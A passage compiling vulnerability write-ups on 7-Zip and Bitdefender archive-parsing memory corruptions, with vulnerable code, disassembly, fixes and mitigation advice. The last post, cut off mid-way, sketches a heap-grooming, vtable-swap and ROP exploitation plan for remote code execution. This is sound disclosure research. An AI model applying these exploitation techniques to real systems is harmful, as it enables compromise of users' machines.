7-Zip: Multiple Memory Corruptions via RAR and ZIP

Introduction

In the following, I will outline two bugs that affect 7-Zip before version 18.00 as well as p7zip. The first one (RAR PPMd) is the more critical and the more involved one. The second one (ZIP Shrink) seems to be less critical, but also much easier to understand.

Memory Corruptions via RAR PPMd (CVE-2018-5996)

7-Zip’s RAR code is mostly based on a recent UnRAR version. For version 3 of the RAR format, PPMd can be used, which is an implementation of the PPMII compression algorithm by Dmitry Shkarin. If you want to learn more about the details of PPMd and PPMII, I’d recommend Shkarin’s paper PPM: one step to practicality1.

Interestingly, the 7z archive format can be used with PPMd as well, and 7-Zip uses the same code that is used for RAR3. As a matter of fact, this is the very PPMd implementation that was used by Bitdefender in a way that caused a stack based buffer overflow.

In essence, this bug is due to improper exception handling in 7-Zip’s RAR3 handler. In particular, one might argue that it is not a bug in the PPMd code itself or in UnRAR’s extraction code.

The Bug

The RAR handler has a function NArchive::NRar::CHandler::Extract2 containing a loop that looks roughly as follows (heavily simplified!):

for (unsigned i = 0;; i++, /*OMITTED: unpack size updates*/) {
  //OMITTED: retrieve i-th item and setup input stream
  CMyComPtr<ICompressCoder> commonCoder;
  switch (item.Method) {
    case '0':
    {
      commonCoder = copyCoder;
      break;
    }
    case '1':
    case '2':
    case '3':
    case '4':
    case '5':
    {
      unsigned m;
      for (m = 0; m < methodItems.Size(); m++)
        if (methodItems[m].RarUnPackVersion == item.UnPackVersion) { break; }
      if (m == methodItems.Size()) { m = methodItems.Add(CreateCoder(/*OMITTED*/)); }
      //OMITTED: solidness check
      commonCoder = methodItems[m].Coder;
      break;
    }
    default:
      outStream.Release();
      RINOK(extractCallback->SetOperationResult(NExtract::NOperationResult::kUnsupportedMethod));
      continue;
  }
  
  HRESULT result = commonCoder->Code(inStream, outStream, &packSize, &outSize, progress);
  //OMITTED: encryptedness, outsize and crc check
  outStream.Release();

  if (result != S_OK) {
    if (result == S_FALSE) { opRes = NExtract::NOperationResult::kDataError; }
    else if (result == E_NOTIMPL) { opRes = NExtract::NOperationResult::kUnsupportedMethod; }
    else { return result; }
  }
  RINOK(extractCallback->SetOperationResult(opRes));
}

The important bit about this function is essentially that at most one coder is created for each RAR unpack version. If an archive contains multiple items that are compressed with the same RAR unpack version, those will be decoded with the same coder object.

Observe, moreover, that a call to the Code method can fail, returning the result S_FALSE, and the created coder will be reused for the next item anyway, given that the callback function does not catch this (it does not). So let us see where the error code S_FALSE may come from. The method NCompress::NRar3::CDecoder::Code3 looks as follows (again simplified):

STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream *outStream,
    const UInt64 *inSize, const UInt64 *outSize, ICompressProgressInfo *progress) {
  try {
    if (!inSize) { return E_INVALIDARG; }
    //OMITTED: allocate and initialize VM, window and bitdecoder
    _outStream = outStream;
    _unpackSize = outSize ? *outSize : (UInt64)(Int64)-1;
    return CodeReal(progress);
  }
  catch(const CInBufferException &e)  { return e.ErrorCode; }
  catch(...) { return S_FALSE; }
}

The CInBufferException is interesting. As the name suggests, this exception may be thrown while reading from the input stream. It is not completely straightforward, but nevertheless easily possible to trigger the exception with a RAR3 archive item such that the error code is S_FALSE. I will leave it as an exercise for the interested reader to figure out the details of how this can be achieved.

Why is this interesting? Well, because in case RAR3 with PPMd is used this exception may be thrown in the middle of an update of the PPMd model, putting the soundness of the model state at risk. Recall that the same coder will be used for the next item even after a CInBufferException with error code S_FALSE has been thrown.

Note, moreover, that the RAR3 decoder holds the PPMd model state. A brief look at the method NCompress::NRar3::CDecoder::InitPPM3 reveals the fact that this model state is only reinitialized if an item explicitly requests it. This is a feature that allows to keep the same model with the collected probability heuristics between different items. But it also means that we can do the following:

  • Construct the first item of a RAR3 archive such that a CInBufferException with error code S_FALSEis thrown in the middle of a PPMd model update. Essentially, this means that we can let an arbitrary call to the Decode method of the range decoder used in Ppmd7_DecodeSymbol4 fail, jumping out of the PPMd code.
  • The subsequent item of the archive does not have the reset bit set that would cause the model to be reinitialized. Hence, the PPMd code will operate on a potentially broken model state.

So far this may not look too bad. In order to understand how this bug can be turned into attacker controlled memory corruptions, we need to understand a little bit more about the PPMd model state and how it is updated.

PPMd Preliminaries

The main idea of all PPM compression algorithms is to build a Markov model of some finite order D. In the PPMd implementation, the model state is essentially a 256-ary context tree of maximum depth D, in which the path from the root to the current context node is to be interpreted as a sequence of byte symbols. In particular, the parent relation is to be understood as a suffix relation. Additionally, every context node stores frequency statistics about possible successor symbols connected with a successor context node.

A context node is of type CPpmd7_Context, defined as follows:

typedef struct CPpmd7_Context_ {
  UInt16 NumStats;
  UInt16 SummFreq;
  CPpmd_State_Ref Stats;
  CPpmd7_Context_Ref Suffix;
} CPpmd7_Context;

The field NumStats holds the number of elements the Stats array contains5. The type CPpmd_State is defined as follows:

typedef struct {
  Byte Symbol;
  Byte Freq;
  UInt16 SuccessorLow;
  UInt16 SuccessorHigh;
} CPpmd_State;

So far, so good. Now what about the model update? I will spare you the details, describing only abstractly how a new symbol is decoded6:

  • When Ppmd7_DecodeSymbol is called, the current context is p->MinContext, which is equal to p->MaxContext, assuming a sound model state.
  • threshold value is read from the range decoder. This value is used to find a corresponding symbol in the Stats array of the current context p->MinContext.
  • If no corresponding symbol can be found, p->MinContext is moved upwards the tree (following the suffix links) until a context with (strictly) larger Stats array is found. Then, a new threshold is read and used to find a corresponding value in the current Stats array, ignoring the symbols of the contexts that have been previously visited. This process is repeated until a value is found.
  • Finally, the ranger decoder’s decode method is called, the found state is written to p->FoundState, and one of the Ppmd7_Update functions is called to update the model. As a part of this process, the UpdateModel function adds the found symbol to the Stats array of each context between p->MaxContext and p->MinContext (exclusively).

One of the key invariants the update mechanism tries to establish is that the Stats array of every context contains each of the 256 symbols at most once. However, this property only follows inductively, since there is no explicit duplicate check when a new symbol is inserted7. With the bug described above, it is easy to see how we can add duplicate symbols to Stats arrays:

  • The first RAR3 item is created such that a few context nodes are created, and the function Ppmd7_DecodeSymbol then moves p->MinContext upwards the tree at least once, until the corresponding symbol is found. Then, the subsequent call to the range decoders decode method fails with a CInBufferException.
  • The next RAR3 item does not have the reset bit set, so that we can continue with the previously created PPMd model.
  • The Ppmd7_DecodeSymbol function is entered with a fresh range decoder and p->MinContext != p->MaxContext. It finds the corresponding symbol immediately in p->MinContext. However, this symbol may now be one that already occurs in the contexts between p->MaxContext and p->MinContext. When the UpdateModel function is called, this symbol is added as a duplicate to the Stats array to each context between p->MaxContext and p->MinContext (exclusively).

Okay, so now we know how to add duplicate symbols into the Stats array. Let us see how we can make use of this to cause an actual memory corruption.

Triggering a Stack Buffer Overflow

The following code is run as a part of Ppmd7_DecodeSymbol to move the p->MinContext pointer upwards the context tree:

CPpmd_State *ps[256];
unsigned numMasked = p->MinContext->NumStats;
do {
  p->OrderFall++;
  if (!p->MinContext->Suffix) { return -1; }
  p->MinContext = Ppmd7_GetContext(p, p->MinContext->Suffix);
} while (p->MinContext->NumStats == numMasked);
UInt32 hiCnt = 0;
CPpmd_State *s = Ppmd7_GetStats(p, p->MinContext);
unsigned i = 0;
unsigned num = p->MinContext->NumStats - numMasked;
do {
  int k = (int)(MASK(s->Symbol));
  hiCnt += (s->Freq & k);
  ps[i] = s++;
  i -= k;
} while (i != num);

MASK is a macro that accesses a byte array which holds the value 0x00 at the index of each masked symbol, and the value 0xFF otherwise. Clearly, the intention is to fill the stack buffer ps with pointers to all unmasked symbol states.

Observe that the stack buffer ps has a fixed size of 256 and there is no overflow check. This means that if the Stats array contains a masked symbol multiple times, we can access the array out of bound and overflow the ps buffer.

Usually, such out of bound buffer reads make exploitation very difficult, because one cannot easily control the memory that is read. However, this is no issue in the case of PPMd, because the implementation allocates only one large pool on the heap, and then makes use of its own memory allocator to allocate all context and state structs within this pool. This ensures very quick allocation and a low memory usage, but it also allows an attacker to control the out of bound read to structures within this pool very reliably and independently of the system’s heap implementation. For example, the first RAR3 item can be constructed such that the pool is filled with the desired data, avoiding uninitialized out of bound reads.

Finally, note that the attacker can overflow the stack buffer with pointers to data that is highly attacker controlled itself.

Triggering a Heap Buffer Overflow

Building on the previous section, we now want to corrupt the heap. Perhaps not surprisingly, it is also possible to read the Stats array out of bound without overflowing the stack buffer ps. This allows us to let s point to a CPpmd_State with attacker controlled data. Since p->FoundState may be one of the psstates and the model updating process assumes that the Stats array of p->MinContext as well as its suffix contexts contain the symbol p->FoundState->Symbol.

This code fragment is part of the function UpdateModel:

do { s++; } while (s->Symbol != p->FoundState->Symbol);
if (s[0].Freq >= s[-1].Freq) {
  SwapStates(&s[0], &s[-1]);
  s--;
}

Again, there is no bound check on the Stats array, so the pointer s can be moved easily over the end of the allocated heap buffer. Optimally, we would construct our input such that s is out of bound and s-1within the allocated pool, allowing an attacker controlled heap corruption.

On Attacker Control, Exploitation and Mitigation

The 7-Zip binaries for Windows are shipped with neither the /NXCOMPAT nor the /DYNAMICBASE flags. This means effectively that 7-Zip runs without ASLR on all Windows systems, and DEP is only enabled on Windows x64 or on Windows 10 x86. For example, the following screenshot shows the most recent 7-Zip 18.00 running on a fully updated Windows 8.1 x86: 7-Zip 18.00 in Process Explorer on Windows 8.1 x86

Moreover, 7-Zip is compiled without /GS flag, so there are no stack canaries.

Since there are various ways to corrupt the stack and the heap in highly attacker controlled ways, exploitation for remote code execution is straightforward, especially if no DEP is used.

I have discussed this issue with Igor Pavlov and tried to convince him to enable all three flags. However, he refused to enable /DYNAMICBASE because he prefers to ship the binaries without relocation table to achieve a minimal binary size. Moreover, he doesn’t want to enable /GS, because it could affect the runtime as well as the binary size. At least he will try to enable /NXCOMPAT for the next release. Apparently, it is currently not enabled because 7-Zip is linked with an obsolete linker that doesn’t support the flag.

Conclusion

The outlined heap and stack memory corruptions are only scratching the surface of possible exploitation paths. Most likely there are many other and possibly even neater ways of causing memory corruptions in an attacker controlled fashion.

This bug demonstrates again how difficult it can be to integrate external code into an existing code base. In particular, handling exceptions correctly and understanding the control flow they induce can be challenging.

In the post about Bitdefender’s PPMd stack buffer overflow, I already made clear that the PPMd code is very fragile. A slight misuse of its API, or a tiny mistake while integrating it into another code base may lead to multiple dangerous memory corruptions.

If you use Shkarin’s PPMd implementation, I would strongly recommend you to harden it by adding out of bound checks wherever possible, and to make sure the basic model invariants always hold. Moreover, in case exceptions are used, one could add an additional error flag to the model that is set to true before updating the model, and only set to false after the update has been successfully completed. This should significantly mitigate the danger of corrupting the model state.

ZIP Shrink: Heap Buffer Overflow (CVE-2017-17969)

Let us proceed by discussing the other bug, which concerns ZIP Shrink. Shrink is an implementation of the Lempel-Ziv-Welch (LZW)8 compression algorithm. It has been used by PKWARE’s PKZIP before version 2.0, which was released in 1993 (sic!). In fact, shrink is so old and so rarely used, that already in 2005, when Igor Pavlov wrote 7-Zip’s shrink decoder, he had a hard time9 finding sample archives to test the code.

In essence, shrink is LZW with a dynamic code size between 9 and 13 bits, and a special feature that allows to partially clear the dictionary.

7-Zip’s shrink decoder is quite straightforward and easy to understand. In fact, it consists of only 200 lines of code. Nevertheless, it contains a buffer overflow bug.

The Bug

The shrink model’s state essentially only consists of the two arrays _parents and _suffixes, which store the LZW dictionary in a space efficient way. Moreover, there is a buffer _stack to which the current sequence is written:

  UInt16 _parents[kNumItems];
  Byte _suffixes[kNumItems];
  Byte _stack[kNumItems];

The following code fragment is part of the method NCompress::NShrink::CDecoder::CodeReal10:

unsigned cur = sym;
unsigned i = 0;
while (cur >= 256) {
  _stack[i++] = _suffixes[cur];
  cur = _parents[cur];
}

Observe that there is no bound check on the value of i.

One way this can be exploited to overflow the heap buffer _stack is by constructing a symbol of sequence such that the _parents array forms a cycle. This is possible, because the decoder only ensures that a parent node does not link to itself (cycle of length one). Interestingly, the old versions of PKZIP create shrink archives that may contain such self-linked parents, so a compatible implementation should actually accept this (7-Zip 18.00 fixes this).

Moreover, using the special symbol sequence 256,2 one can clear parent nodes in an attacker controlled fashion. A cleared parent node will be set to kNumItems. Since there is no check whether a parent has been cleared or not, the parents array can be accessed out of bound.

This sounds promising, and it is actually possible to construct archives that make the decoder write attacker controlled data out of bound. However, I didn’t find an easy way to do so without ending up in an infinite loop. This matters, because the index i is increased in every iteration of the loop. Hence, an infinite loop will quickly lead to a segmentation fault, making exploitation for code execution very difficult (if not impossible). However, I didn’t spend too much time on this, so maybe it is possible to corrupt the heap without entering an infinite loop after all.

Bitdefender: Heap Buffer Overflow via 7z LZMA

Introduction

For the write-up on the 7z PPMD bug, I read a lot of the original 7-Zip source code and discovered a few new things that looked promising to investigate in anti-virus products. Therefore, I took another stab at analyzing Bitdefender’s 7z module.

I previously wrote about relaxed file processing. The Bitdefender 7z PPMD stack buffer overflow1 was a good example of relaxed file processing by removing a check (that is, removing code).

This bug demonstrates another fundamental difficulty that arises when incorporating new code into an existing code base. In particular, a minimal set of changes to the new code is often inevitable. Mostly, this affects memory allocation and code that is concerned with file access, especially if a totally different file abstraction is used. The presented bug is an example of the former type of difficulty. More specifically, an incorrect use of a memory allocation function that extends the 7-Zip source code in Bitdefender’s 7z module causes a heap buffer overflow.

Getting Into the Details

When Bitdefender’s 7z module discovers an EncodedHeader3 in a 7z archive, it tries to decompress it with the LZMA decoder. Their code seems to be based on 7-Zip, but they made a few changes. Loosely speaking, the extraction of a 7z EncodedHeader is implemented as follows:

  1. Read the unpackSize from the 7z EncodedHeader.
  2. Allocate unpackSize bytes.
  3. Use the C API of the LZMA decoder that comes with 7-Zip and let it decompress the stream.

The following snippet shows how the allocation function is called:

1DD02A845FA lea     rcx, [rdi+128h] //<-------- result
1DD02A84601 mov     rbx, [rdi+168h]
1DD02A84608 mov     [rsp+128h], rsi
1DD02A84610 mov     rsi, [rax+10h]
1DD02A84614 mov     [rsp+0E0h], r15
1DD02A8461C mov     edx, [rsi]      //<-------- size
1DD02A8461E call    SZ_AllocBuffer

Recall the x64 calling convention. In particular, the first two integer arguments (from left to right) are passed via rcx and rdx.

SZ_AllocBuffer is a function within the Bitdefender 7z module. It has two arguments:

  • The first argument result is a pointer to which the result (a pointer to the allocated buffer in case of success or NULL in case of a failure) is written.
  • The second argument size is the allocation size.

Let us look at the functions’s implementation.

260ED3025D0 SZ_AllocBuffer proc near
260ED3025D0
260ED3025D0 mov     [rsp+8], rbx
260ED3025D5 push    rdi
260ED3025D6 sub     rsp, 20h
260ED3025DA mov     rbx, rcx
260ED3025DD mov     edi, edx //<-------- edi holds size
260ED3025DF mov     rcx, [rcx]
260ED3025E2 test    rcx, rcx
260ED3025E5 jz      short loc_260ED3025EC
260ED3025E7 call    near ptr irrelevant_function
260ED3025EC
260ED3025EC loc_260ED3025EC:
260ED3025EC cmp     edi, 0FFFFFFFFh  //<------- {*}
260ED3025EF jbe     short loc_260ED302606
260ED3025F1 xor     ecx, ecx
260ED3025F3 mov     [rbx], rcx
260ED3025F6 mov     eax, ecx
260ED3025F8 mov     [rbx+8], ecx
260ED3025FB mov     rbx, [rsp+30h]
260ED302600 add     rsp, 20h
260ED302604 pop     rdi
260ED302605 retn
260ED302606 ; ------------------------------------
260ED302606
260ED302606 loc_260ED302606:                        
260ED302606 mov     rcx, rdi  //<------ set size argument for mymalloc
260ED302609 call    mymalloc
//[rest of the function omitted]

Note that mymalloc is just a wrapper function that eventually calls malloc and returns the result.

Apparently, the programmer expected the size argument of SZ_AllocBuffer to be of a type with size greater than 32 bits. Obviously, it is only a 32-bit value.

It is funny to see that the compiler failed to optimize away the comparison at {*}, given that its result is only used for an unsigned comparison jbe. If you have any hints on why this might happen, I’d be very interested to hear them.

After SZ_AllocBuffer returns, the function LzmaDecode is called:

LzmaDecode(Byte *dest, SizeT *destLen, const Byte *src, SizeT *srcLen, /* further arguments omitted */)

Note that dest is the buffer allocated with SZ_AllocBuffer and destLen is supposed to be a pointer to the buffer’s size.

In the reference implementation, SizeT is defined as size_t. Interestingly, Bitdefender’s 7z module uses a 64-bit type for SizeT in both the 32-bit and the 64-bit version, making both versions vulnerable to this bug. I suspect that this is the result of an effort to create identical behavior for the 32-bit and 64-bit versions of the engine.

The LZMA decoder extracts the given src stream and writes (up to) *destLen bytes to the dest buffer, where *destLen is the 64-bit unpackSize from the 7z EncodedHeader. This results in a neat heap buffer overflow.

Triggering the Bug

To trigger the bug, we create a 7z LZMA stream containing the data we want to write on the heap. Then, we construct a 7z EncodedHeader with a Folder that has an unpackSize of (1<<32) + 1. This should make the function SZ_AllocBuffer allocate a buffer of 1 byte.

That sounds nice, but does this actually work?

0:000> g
!Heap block at 1F091472D40 modified at 1F091472D51 past requested size of 1
(2f8.14ec): Break instruction exception - code 80000003 (first chance)
ntdll!RtlpNtMakeTemporaryKey+0x435e:
00007ff9`d849c4ce cc              int     3

0:000> db 1F091472D51
000001f0`91472d51  59 45 53 2c 20 54 48 49-53 20 57 4f 52 4b 53 ab  YES, THIS WORKS.

Attacker Control and Exploitation

The attacker can write completely arbitrary data to the heap without any restriction. A file system minifilter is used to scan all files that touch the disk, making this vulnerability easily exploitable remotely, for example by sending an e-mail with a crafted file as attachment to the victim.

Moreover, the engine runs unsandboxed and as NT Authority\SYSTEM. Hence, this bug is highly critical. However, since ASLR and DEP are in place, successful exploitation for remote code execution might require another bug (e.g. an information leak) to bypass ASLR.

Note also that Bitdefender’s engine is licensed to many different anti-virus vendors, all of which could be affected by this bug.

The Fix

The patched version of the function SZ_AllocBuffer looks as follows:

1E0CEA52AE0 SZ_AllocBuffer proc near
1E0CEA52AE0
1E0CEA52AE0 mov     [rsp+8], rbx
1E0CEA52AE5 mov     [rsp+10h], rsi
1E0CEA52AEA push    rdi
1E0CEA52AEB sub     rsp, 20h
1E0CEA52AEF mov     esi, 0FFFFFFFFh
1E0CEA52AF4 mov     rdi, rdx  //<-----rdi holds the size
1E0CEA52AF7 mov     rbx, rcx
1E0CEA52AFA cmp     rdx, rsi  //<------------{1}
1E0CEA52AFD jbe     short loc_1E0CEA52B11
1E0CEA52AFF xor     eax, eax
1E0CEA52B01 mov     rbx, [rsp+30h]
1E0CEA52B06 mov     rsi, [rsp+38h]
1E0CEA52B0B add     rsp, 20h
1E0CEA52B0F pop     rdi
1E0CEA52B10 retn
1E0CEA52B11 ; -----------------------------------
1E0CEA52B11
1E0CEA52B11 loc_1E0CEA52B11: 
1E0CEA52B11 mov     rcx, [rcx]
1E0CEA52B14 test    rcx, rcx
1E0CEA52B17 jz      short loc_1E0CEA52B1E
1E0CEA52B19 call    near ptr irrelevant_function
1E0CEA52B1E
1E0CEA52B1E loc_1E0CEA52B1E: 
1E0CEA52B1E cmp     edi, esi  //<------------{2}
1E0CEA52B20 jbe     short loc_1E0CEA52B29
1E0CEA52B22 xor     ecx, ecx
1E0CEA52B24 mov     [rbx], rcx
1E0CEA52B27 jmp     short loc_1E0CEA52B3B
1E0CEA52B29 ; -----------------------------------
1E0CEA52B29
1E0CEA52B29 loc_1E0CEA52B29:
1E0CEA52B29 mov     ecx, edi
1E0CEA52B2B call    near ptr mymalloc
//[rest of the function omitted]

Most importantly, we see that the function’s second argument size has been changed to a 64-bit type.

Note that at {1}, a check ensures that the passed size is not greater than 0xFFFFFFFF.

At {2}, the value of rdi is guaranteed to be at most 0xFFFFFFFF, hence it suffices to use the 32-bit register edi. However, just as in the original version (see above), it is useless to compare this 32-bit value once more to 0xFFFFFFFF and it is a mystery to me why the compiler does not optimize this away.

Using a full 64-bit type for the second argument size resolves the described bug.

Conclusion

In a nutshell, the discovered bug is a 64-bit value size being passed to the allocation function SZ_AllocBuffer which looks roughly like this4:

void* SZ_AllocBuffer(void *resultptr, uint32_t size);

Assuming that the size is not explicitly casted, the compiler should throw a warning of the following kind:

warning C4244: 'argument': conversion from 'uint64_t' to 'uint32_t', possible loss of data

Note that in Microsoft’s MSVC compiler, this is a Level2 warning (Level1 being the lowest and Level4 being the highest level). Hence, this bug most likely could have been avoided simply by taking compiler warnings seriously.

For a critical codebase such as the engine of an anti-virus product, it would be adequate to treat warnings as errors, at least up to a warning level of 2 or 3.

Nevertheless, the general type of bug shows that even if only few lines of additional code are necessary to incorporate external code (such as the 7-Zip code) into a code base, those very lines can be particularly prone to error.

 

7-Zip From Uninitialized Memory to Remote Code Execution

Introduction

7-Zip’s RAR code is mostly based on a recent UnRAR version, but especially the higher-level parts of the code have been heavily modified. As we have seen in some of my earlier blog posts, the UnRAR code is very fragile. Therefore, it is hardly surprising that any changes to this code are likely to introduce new bugs.

Very abstractly, the bug can be described as follows: The initialization of some member data structures of the RAR decoder classes relies on the RAR handler to configure the decoder correctly before decoding something. Unfortunately, the RAR handler fails to sanitize its input data and passes the incorrect configuration into the decoder, causing usage of uninitialized memory.

Now you may think that this sounds harmless and boring. Admittedly, this is what I thought when I first discovered the bug. Surprisingly, it is anything but harmless.

In the following, I will outline the bug in more detail. Then, we will take a brief look at 7-Zip’s patch. Finally, we will see how the bug can be exploited for remote code execution.

The Bug (CVE-2018-10115)

This new bug arises in the context of handling solid compression. The idea of solid compression is simple: Given a set of files (e.g., from a folder), we can interpret them as the concatenation to one single data block, and then compress this whole block (as opposed to compressing every file for itself). This can yield a higher compression rate, in particular if there are many files that are somewhat similar.

In the RAR format (before version 5), solid compression can be used in a very flexible way: Each item (representing a file) of the archive can be marked as solid, independently from all other items. The idea is that if an item is decoded that has this solid bit set, the decoder would not reinitialize its state, essentially continuing from the state of the previous item.

Obviously, one needs to make sure that the decoder object initializes its state at the beginning (for the first item it is decoding). Let us have a look at how this is implemented in 7-Zip. The RAR handler has a method NArchive::NRar::CHandler::Extract1 that contains a loop which iterates with a variable index over all items. In this loop, we can find the following code:

Byte isSolid = (Byte)((IsSolid(index) || item.IsSplitBefore()) ? 1: 0);
if (solidStart) {
  isSolid = 0;
  solidStart = false;
}

RINOK(compressSetDecoderProperties->SetDecoderProperties2(&isSolid, 1));

The basic idea is to have a boolean flag solidStart, which is initialized to true (before the loop), making sure that the decoder is configured with isSolid==false for the first item that is decoded. Furthermore, the decoder will (re)initialize its state (before starting to decode) whenever it is called with isSolid==false.

That seems to be correct, right? Well, the problem is that RAR supports three different encoding methods (excluding version 5), and each item can be encoded with a different method. In particular, for each of these three encoding methods there is a different decoder object. Interestingly, the constructors of these decoder objects leave a large part of their state uninitialized. This is because the state needs to be reinitialized for non-solid items anyway and the implicit assumption is that the caller of the decoder would make sure that the first call on the decoder is with isSolid==false. We can easily violate this assumption with a RAR archive that is constructed as follows2:

  • The first item uses encoding method v1.
  • The second item uses encoding method v2 (or v3), and has the solid bit set.

The first item will cause the solidStart flag to be set to false. Then, for the second item, a new Rar2 decoder object is created and (since the solid flag is set) the decoding is run with a large part of the decoder’s state being uninitialized.

At first sight, this may not look too bad. However, various parts of the uninitialized state can be used to cause memory corruptions:

  1. Member variables holding the size of heap-based buffers. These variables may now hold a size that is larger than the actual buffer, allowing a heap-based buffer overflow.
  2. Arrays with indices that are used to index into other arrays, for both reading and writing values.
  3. The PPMd state discussed in my previous post. Recall that the code relies heavily on the soundness of the model’s state, which can now be violated easily.

Obviously, the list is not complete.

The Fix

In essence, the bug is that the decoder classes do not guarantee that their state is correctly initialized before they are used for the first time. Instead, they rely on the caller to configure the decoder with isSolid==false before the first item is decoded. As we have seen, this does not turn out very well.

There are two different approaches to resolve this bug:

  1. Make the constructor of the decoder classes initialize the full state.
  2. Add an additional boolean member solidAllowed (which is initialized to false) to each decoder class. If isSolid==true even though solidAllowed==false, the decoder can abort with a failure (or set isSolid=false).

UnRAR seems to implement the first option. Igor Pavlov, however, chose to go with a variant of the second option for 7-Zip.

In case you want to patch a fork of 7-Zip or you are just interested in the details of the fix, you might want to have a look at this file, which summarizes the changes.

On Exploitation Mitigation

In the previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I mentioned the lack of DEP and ASLR in 7-Zip before version 18.00 (beta). Shortly after the release of that blog post, Igor Pavlov released 7-Zip 18.01 with the /NXCOMPAT flag, delivering on his promise to enable DEP on all platforms. Moreover, all dynamic libraries (7z.dll7-zip.dll7-zip32.dll) have the /DYNAMICBASE flag and a relocation table. Hence, most of the running code is subject to ASLR.

However, all main executables (7zFM.exe7zG.exe7z.exe) come without /DYNAMICBASE and have a stripped relocation table. This means that not only are they not subject to ASLR, but you cannot even enforce ASLR with a tool like EMET or its successor, the Windows Defender Exploit Guard.

Obviously, ASLR can only be effective if all modules are properly randomized. I discussed this with Igor and convinced him to ship the main executables of the new 7-Zip 18.05 with /DYNAMICBASE and relocation table. The 64-bit version still runs with the standard non-high entropy ASLR (presumably because the image base is smaller than 4GB), but this is a minor issue that can be addressed in a future release.

On an additional note, I would like to point out that 7-Zip never allocates or maps additional executable memory, making it a great candidate for Arbitrary Code Guard (ACG). In case you are using Windows 10, you can enable it for 7-Zip by adding the main executables 7z.exe7zFM.exe, and 7zG.exe in the Windows Defender Security Center (App & browser control -> Exploit Protection -> Program settings). This will essentially enforce a W^X policy and therefore make exploitation for code execution substantially more difficult.

Writing a Code Execution Exploit

Normally, I would not spend much time thinking about actual weaponized exploits. However, it can sometimes be instructive to write an exploit, if only to learn how much it actually takes to succeed in the given case.

The platform we target is a fully updated Windows 10 Redstone 4 (RS4, Build 17134.1) 64-bit, running 7-Zip 18.01 x64.

Picking an Adequate Exploitation Scenario

There are three basic ways to extract an archive using 7-Zip:

  1. Open the archive with the GUI and either extract files separately (using drag and drop), or extract the whole archive using the Extract button.
  2. Right-click the archive and select "7-Zip->Extract Here" or "7-Zip->Extract to subfolder" from the context menu.
  3. Using the command-line version of 7-Zip.

Each of these three methods will invoke a different executable (7zFM.exe7zG.exe7z.exe). Since we want to exploit the lack of ASLR in these modules, we need to fix the extraction method.

The second method (extraction via context menu) seems to be the most attractive one, since it is a method that is probably used very often, and at the same time it should give us a quite predictable behavior (unlike the first method, where a user might decide to open the archive but then extract the “wrong” file). Hence, we go with the second method.

Exploitation Strategy

Using the bug from above, we can create a Rar decoder that operates on (mostly) uninitialized state. So let us see for which Rar decoder this may allow us to corrupt the heap in an attacker-controlled manner.

One possibility is to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::HuffDecode3contains the following code:

int bytePlace = DecodeNum(...);
// some code omitted
bytePlace &= 0xff;
// more code omitted
for (;;)
{
  curByte = ChSet[bytePlace];
  newBytePlace = NToPl[curByte++ & 0xff]++;
  if ((curByte & 0xff) > 0xa1)
    CorrHuff(ChSet, NToPl);
  else
    break;
}

ChSet[bytePlace] = ChSet[newBytePlace];
ChSet[newBytePlace] = curByte;
return S_OK;

This is very useful, because the uninitialized state of the Rar1 decoder includes the uint32_t arrays ChSet and NtoPl. Hence, newBytePlace is an attacker-controlled uint32_t, and so is curByte (with the restriction that the least significant byte cannot be larger than 0xa1). Moreover, bytePlace is determined by the input stream, so it is attacker-controlled as well (but cannot be larger than 0xff).

So this would give us a pretty good (though not perfect) read-write primitive. Note, however, that we are in a 64-bit address space, so we will not be able to reach the vtable pointer of the Rar1 decoder object with a 32-bit offset (even if multiplied by sizeof(uint32_t)) from ChSet. Therefore, we will target the vtable pointer of an object that is placed after the Rar1 decoder on the heap.

The idea is to use a Rar3 decoder object for this purpose, which we will use at the same time to hold our payload. In particular, we use the RW-primitive from above to swap the pointer _windows, which is a member variable of the Rar3 decoder, with the vtable pointer of the very same Rar3 decoder object._window points to a 4MB-sized buffer which holds data that has been extracted with the decoder (i.e., it is fully attacker-controlled).

Naturally, we will fill the _window buffer with the address of a stack pivot (xchg rax, rsp), followed by a ROP chain to obtain executable memory and execute the shellcode (which we also put into the _windowbuffer).

Putting a Replacement Object on the Heap

In order to succeed with the outlined strategy, we need to have full control of the decoder’s uninitialized memory. Roughly speaking, we will do this by making an allocation of the size of the Rar1 decoder object, writing the desired data to it, and then freeing it at some point before the actual Rar1 decoder is allocated.

Obviously, we will need to make sure that the Rar1 decoder’s allocation actually reuses the same chunk of memory that we freed before. A straightforward way to achieve this is to activate Low Fragmentation Heap (LFH) on the corresponding allocation size, then spray the LFH with multiple of those replacement objects. This actually works, but because allocations on the LFH are randomized since Windows 8, this method will never be able to place the Rar1 decoder object in constant distance to any other object. Therefore, we try to avoid the LFH and place our object on the regular heap. Very roughly, the allocation strategy is as follows:

  1. Create around 18 pending allocations of all (relevant) sizes smaller than the Rar1 decoder object. This will activate LFH for these allocation sizes and prevent such small allocations from destroying our clean heap structure.
  2. Allocate the replacement object and free it, making sure it is surrounded by busy allocations (and hence not merged with other free chunks).
  3. Rar3 decoder is allocated (the replacement object is not reused, because the Rar3 decoder is larger than the Rar1 decoder).
  4. Rar1 decoder is allocated (reusing the replacement object).

Note that it is unavoidable to allocate some decoder before allocating that Rar1 decoder, because only this way the solidStart flag will be set to false and the next decoder will not be initialized correctly (see above).

If everything works as planned, the Rar1 decoder reuses our replacement object, and the Rar3 decoder object is placed with some constant offset after the Rar1 decoder object.

Allocating and Freeing on the Heap

Obviously, the above allocation strategy requires us to be able to make heap allocations in a reasonably controlled manner. Going through the whole code of the RAR handler, I could not find many good ways to make dynamic allocations on the default process heap that have attacker-controlled size and store attacker-controlled content. In fact, it seems that the only way to do such dynamic allocations is via the names of the archive’s items. Let us see how this works.

When an archive is opened, the method NArchive::NRar::CHandler::Open21 reads all items of the archive with the following code (simplified):

CItem item;

for (;;)
{
  // some code omitted
  bool filled;
  archive.GetNextItem(item, getTextPassword, filled, error);
  // some more code omitted
  if (!filled) {
    // some more code omitted
    break;
  }
  if (item.IgnoreItem()) { continue; }
  bool needAdd = true;
  // some more code omitted
  _items.Add(item);
  
}

The class CItem has a member variable Name of type AString, which stores the (ASCII) name of the corresponding item in a heap-allocated buffer.

Unfortunately, the name of an item is set as follows in NArchive::NRar::CInArchive::ReadName1:

for (i = 0; i < nameSize && p[i] != 0; i++) {}
item.Name.SetFrom((const char *)p, i);

